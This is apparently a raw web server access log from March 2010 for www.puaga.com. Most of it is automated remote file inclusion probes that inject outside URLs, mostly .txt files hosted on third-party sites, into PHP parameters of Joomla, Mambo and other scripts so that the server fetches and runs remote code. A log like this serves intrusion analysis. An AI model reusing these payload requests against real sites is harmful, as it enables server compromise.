222.122.197.10 - - [05/Mar/2010:05:17:58 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:05:18:01 -0800] "GET /logs/access.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [05/Mar/2010:05:18:24 -0800] "GET /logs/access_100222.log//rsgallery.html.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.27.51 - - [05/Mar/2010:05:18:28 -0800] "GET /logs/access_100211.log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [05/Mar/2010:05:19:07 -0800] "GET /logs/access_100219.log//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://zpeppe.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
188.93.10.36 - - [05/Mar/2010:05:19:07 -0800] "GET /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://zpeppe.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
188.93.10.36 - - [05/Mar/2010:05:19:07 -0800] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://zpeppe.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
188.93.10.36 - - [05/Mar/2010:05:19:14 -0800] "GET /logs/access_100208.log//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://zpeppe.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:05:19:15 -0800] "GET /logs/access_100226.log/////?_SERVER[DOCUMENT_ROOT]=http://mytwitterblog.info/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [05/Mar/2010:05:19:30 -0800] "GET /logs/access_100216.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [05/Mar/2010:05:19:52 -0800] "GET /logs/access_100211.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [05/Mar/2010:05:19:57 -0800] "GET /logs//index!php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [05/Mar/2010:05:19:57 -0800] "GET /index!php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [05/Mar/2010:05:19:57 -0800] "GET /logs/access_100211.log%20%20//index!php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [05/Mar/2010:05:20:09 -0800] "GET /logs/access_100225.log///util/cooperation.=http://controlscan.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [05/Mar/2010:05:20:09 -0800] "GET //util/cooperation.=http://controlscan.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [05/Mar/2010:05:20:09 -0800] "GET /logs///util/cooperation.=http://controlscan.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [05/Mar/2010:05:20:15 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.zahirajans.com/v22/cache/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
62.140.23.24 - - [05/Mar/2010:05:20:15 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.zahirajans.com/v22/cache/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
41.204.218.244 - - [05/Mar/2010:05:20:28 -0800] "GET /logs/access_100209.log%20%20//index!php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [05/Mar/2010:05:20:41 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.zahirajans.com/v22/cache/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
62.140.23.24 - - [05/Mar/2010:05:20:41 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.zahirajans.com/v22/cache/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:05:21:15 -0800] "GET /logs/access_100211.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.97.143.12 - - [05/Mar/2010:05:21:58 -0800] "GET /favicon.ico HTTP/1.1" 200 1406 "http://pixero.net/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10" "pixero.net"
71.97.143.12 - - [05/Mar/2010:05:22:02 -0800] "GET /pnetsite/releases/PreviewRelease1.sit HTTP/1.1" 200 396354 "http://pixero.net/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10" "pixero.net"
216.119.103.12 - - [05/Mar/2010:05:22:09 -0800] "GET /logs/access_100211.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.97.143.12 - - [05/Mar/2010:05:22:12 -0800] "GET / HTTP/1.1" 200 468 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10" "pixero.net"
220.80.108.81 - - [05/Mar/2010:05:22:18 -0800] "GET /logs/access_100224.log///util/cooperation.=http://controlscan.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:05:22:27 -0800] "GET /logs/access_100213.log//?_zb_path=http://mytwitterblog.info/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:05:22:27 -0800] "GET /logs//?_zb_path=http://mytwitterblog.info/robot.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:05:22:28 -0800] "GET /?_zb_path=http://mytwitterblog.info/robot.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.250.255.242 - - [05/Mar/2010:05:23:42 -0800] "GET /logs/access_091214.log HTTP/1.1" 404 5258 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.puaga.com"
41.204.218.244 - - [05/Mar/2010:05:24:04 -0800] "GET /logs/access_100211.log//index!php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [05/Mar/2010:05:24:04 -0800] "GET /index!php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [05/Mar/2010:05:24:04 -0800] "GET /logs//index!php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [05/Mar/2010:05:24:16 -0800] "GET /logs/access_100209.log//index!php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [05/Mar/2010:05:24:32 -0800] "GET /logs/access_100211.log//index!php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [05/Mar/2010:05:24:36 -0800] "GET /logs/access_100209.log//index!php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:05:26:32 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:05:26:35 -0800] "GET /logs/access_100224.log//newspublish/include.php?path%5Bdocroot%5D=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:05:26:55 -0800] "GET /logs/access_100224.log//newspublish/include.php?path%5Bdocroot%5D=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:05:26:56 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:05:26:57 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:05:27:27 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:05:27:27 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:05:27:34 -0800] "GET /logs/access_100224.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:05:28:09 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:05:28:10 -0800] "GET /logs/access_100224.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:05:28:10 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [05/Mar/2010:05:30:45 -0800] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [05/Mar/2010:05:30:46 -0800] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [05/Mar/2010:05:30:47 -0800] "GET /logs/access_100226.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [05/Mar/2010:05:31:28 -0800] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [05/Mar/2010:05:31:28 -0800] "GET /logs/access_100226.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [05/Mar/2010:05:31:28 -0800] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [05/Mar/2010:05:33:40 -0800] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [05/Mar/2010:05:33:40 -0800] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [05/Mar/2010:05:33:40 -0800] "GET /logs/access_100226.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [05/Mar/2010:05:34:34 -0800] "GET /logs/access_100220.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:05:35:43 -0800] "GET /logs/access_100128.log///bbs/write_update.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:05:37:38 -0800] "GET /logs/access_100129.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.94.114 - - [05/Mar/2010:05:37:50 -0800] "GET /logs/access_100211.log//administrator/index3.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
75.125.94.114 - - [05/Mar/2010:05:37:50 -0800] "GET /administrator/index3.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
75.125.94.114 - - [05/Mar/2010:05:37:50 -0800] "GET /logs//administrator/index3.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:05:39:27 -0800] "GET /download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:05:39:28 -0800] "GET /logs/access_100219.log%20%20//download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:05:39:28 -0800] "GET /logs//download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:05:39:29 -0800] "GET /download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:05:39:29 -0800] "GET /logs//download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:05:39:31 -0800] "GET /logs/access_100219.log%20%20//download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:05:40:24 -0800] "GET /logs//download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:05:40:25 -0800] "GET /download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:05:40:25 -0800] "GET /logs/access_100219.log//download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [05/Mar/2010:05:40:30 -0800] "GET /logs/access_100222.log/?base_folder=http://thisrapgame.com/wp-content/themes/ThisRapGame/phpThumb/cache/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
64.6.109.50 - - [05/Mar/2010:05:40:30 -0800] "GET /logs/?base_folder=http://thisrapgame.com/wp-content/themes/ThisRapGame/phpThumb/cache/id.txt??? HTTP/1.1" 200 4942 "-" "libwww-perl/5.834" "www.puaga.com"
64.6.109.50 - - [05/Mar/2010:05:40:31 -0800] "GET /?base_folder=http://thisrapgame.com/wp-content/themes/ThisRapGame/phpThumb/cache/id.txt??? HTTP/1.1" 200 3642 "-" "libwww-perl/5.834" "www.puaga.com"
64.6.109.50 - - [05/Mar/2010:05:40:36 -0800] "GET /logs/access_100206.log/?base_folder=http://thisrapgame.com/wp-content/themes/ThisRapGame/phpThumb/cache/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:05:41:28 -0800] "GET /logs/access_100219.log//download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:05:41:28 -0800] "GET /download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:05:41:28 -0800] "GET /logs//download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:05:41:49 -0800] "GET /logs/access_100222.log//download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.202.2.23 - - [05/Mar/2010:05:41:50 -0800] "GET /download.php?board_skin_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.202.2.23 - - [05/Mar/2010:05:41:50 -0800] "GET /logs//download.php?board_skin_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.202.2.23 - - [05/Mar/2010:05:41:50 -0800] "GET /logs/access_100219.log//download.php?board_skin_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [05/Mar/2010:05:42:33 -0800] "GET /delete_comment.php?board_skin_path=http://www.zahirajans.com/v22/cache/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
62.140.23.24 - - [05/Mar/2010:05:42:33 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.zahirajans.com/v22/cache/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:05:42:41 -0800] "GET /logs/access_100219.log//download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:05:42:41 -0800] "GET /download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:05:42:42 -0800] "GET /download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:05:42:42 -0800] "GET /logs/access_100219.log//download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:05:42:42 -0800] "GET /logs//download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:05:42:42 -0800] "GET /logs//download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:05:42:50 -0800] "GET /logs/access_100222.log//download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.112.170.135 - - [05/Mar/2010:05:42:51 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ess.uvic.ca/files/photologue/photos/frosh2008/idi.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
69.112.170.135 - - [05/Mar/2010:05:42:52 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ess.uvic.ca/files/photologue/photos/frosh2008/idi.txt?%0D?? HTTP/1.1" 200 3642 "-" "libwww-perl/5.834" "www.puaga.com"
69.112.170.135 - - [05/Mar/2010:05:42:52 -0800] "GET /logs/access_100208.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ess.uvic.ca/files/photologue/photos/frosh2008/idi.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:05:43:02 -0800] "GET /logs/access_100214.log///bbs/write_update.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:05:43:07 -0800] "GET /logs/access_100222.log//download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:05:43:09 -0800] "GET /logs/access_100222.log//download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.202.2.23 - - [05/Mar/2010:05:43:55 -0800] "GET /logs/access_100222.log//download.php?board_skin_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
186.28.232.13 - - [05/Mar/2010:05:44:32 -0800] "GET /logs/access_100211.log//administrator/index3.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
186.28.232.13 - - [05/Mar/2010:05:44:32 -0800] "GET /administrator/index3.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
186.28.232.13 - - [05/Mar/2010:05:44:32 -0800] "GET /logs//administrator/index3.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:05:44:35 -0800] "GET /logs/access_100222.log%20%20//download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:05:44:50 -0800] "GET /logs/access_100222.log%20%20//download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
163.13.224.70 - - [05/Mar/2010:05:45:09 -0800] "GET /conf.php?subdir=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
163.13.224.70 - - [05/Mar/2010:05:45:09 -0800] "GET /logs/conf.php?subdir=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
163.13.224.70 - - [05/Mar/2010:05:45:12 -0800] "GET /logs/access_100222.log%20%20/conf.php?subdir=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
163.13.224.70 - - [05/Mar/2010:05:45:26 -0800] "GET /logs/access_100212.log%20%20/conf.php?subdir=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [05/Mar/2010:05:46:46 -0800] "GET /logs/access_100219.log%20%20/?INCLUDE_FOLDER=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [05/Mar/2010:05:46:46 -0800] "GET /logs/?INCLUDE_FOLDER=http://zstef.interfree.it/id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [05/Mar/2010:05:46:46 -0800] "GET /?INCLUDE_FOLDER=http://zstef.interfree.it/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [05/Mar/2010:05:46:54 -0800] "GET /logs/access_100215.log%20%20/?INCLUDE_FOLDER=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [05/Mar/2010:05:47:41 -0800] "GET /logs/access_100226.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:05:47:50 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:05:47:56 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:05:47:56 -0800] "GET /logs/access_100224.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:48:03 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.akarin.de/baner.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
